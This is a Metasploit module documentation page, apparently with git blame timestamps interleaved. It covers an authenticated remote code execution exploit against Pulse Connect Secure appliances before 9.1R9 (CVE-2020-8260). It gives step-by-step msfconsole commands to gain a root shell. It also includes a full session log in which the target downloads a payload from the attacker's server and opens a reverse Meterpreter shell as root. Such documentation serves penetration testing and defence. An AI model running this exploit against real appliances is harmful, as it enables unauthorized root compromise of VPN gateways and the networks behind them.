2020-11-08 22:31:26 -05:00
## Vulnerable Application
2020-11-08 22:38:53 -05:00
The Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability which allows an authenticated attacker
2020-11-08 22:31:26 -05:00
to overwrite arbitrary files, resulting in Remote Code Execution as root. Admin credentials are required for successful exploitation.
NCC Group [wrote ](https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/ )
in their findings a few different ways to achieve RCE through the gzip vulnerability. This exploit utilizes the Template Toolkit method
2020-11-08 22:38:53 -05:00
which works up to 9.1R8 (possibly more), whereas the other methods were patched earlier. With this method, since the payload is sent in the perl
2020-11-08 22:31:26 -05:00
template, there are also no bad characters.
Of note, MANY binaries are not in `$PATH` , but are located in `/home/bin/` . Thanks to @wvu for pointing that out.
Pulse Secure Connect trial can be downloaded [here ](https://www.pulsesecure.net/trynow/pulse-connect-secure/ ).
## Verification Steps
1. Install the server
1. Start msfconsole
1. Do: `use exploit/linux/http/pulse_secure_gzip_rce`
1. Do: `set rhosts [IP]`
1. Do: `set username [username]`
1. Do: `set password [password]`
1. Do: `run`
1. You should get a root shell
## Options
### cmd
If this option is set, a single command will be run instead of the payload. Defaults to `` (empty)
## Scenarios
### Pulse Connect Secure 9.1R8 build 7453, Meterpreter Payload
` ``
2025-07-17 09:53:40 +01:00
msf > use exploit/linux/http/pulse_secure_gzip_rce
2020-12-07 10:54:20 -05:00
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
2025-07-17 09:53:40 +01:00
msf exploit(linux/http/pulse_secure_gzip_rce) > set RHOSTS 192.168.159.100
2020-12-07 10:54:20 -05:00
RHOSTS => 192.168.159.100
2025-07-17 09:53:40 +01:00
msf exploit(linux/http/pulse_secure_gzip_rce) > set USERNAME admin
2020-12-07 10:54:20 -05:00
USERNAME => admin
2025-07-17 09:53:40 +01:00
msf exploit(linux/http/pulse_secure_gzip_rce) > set PASSWORD Password1!
2020-12-07 10:54:20 -05:00
PASSWORD => Password1!
2025-07-17 09:53:40 +01:00
msf exploit(linux/http/pulse_secure_gzip_rce) > set LHOST 192.168.159.128
2020-12-07 10:54:20 -05:00
LHOST => 192.168.159.128
2025-07-17 09:53:40 +01:00
msf exploit(linux/http/pulse_secure_gzip_rce) > exploit
2020-11-08 22:31:26 -05:00
2020-12-07 10:54:20 -05:00
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Version 9.1, revision 8, build 7453 found
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/m6x4OtFXogsSCK
[*] Local IP: http://192.168.250.87:8080/m6x4OtFXogsSCK
[*] Exploit trigger will be at /dana-na/auth/setcookie.cgi with a header of XLQOBGKB
[*] Requesting backup config page
[*] Uploading encrypted config backup
[*] Triggering RCE
[*] Client 192.168.159.100 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3) requested /m6x4OtFXogsSCK
[*] Sending payload to 192.168.159.100 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3)
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.100:57548) at 2020-12-07 10:52:54 -0500
[*] Command Stager progress - 100.00% done (122/122 bytes)
[*] Logging out to prevent warnings to other admins
2020-11-08 22:31:26 -05:00
[*] Server stopped.
meterpreter > getuid
Server username: root @ localhost2 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
2020-12-07 10:54:20 -05:00
Computer : 192.168.159.100
2020-11-08 22:31:26 -05:00
OS : (Linux 2.6.32-00025-g841d072-dirty)
Architecture : x64
2020-12-07 10:54:20 -05:00
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
2020-11-08 22:31:26 -05:00
` ``
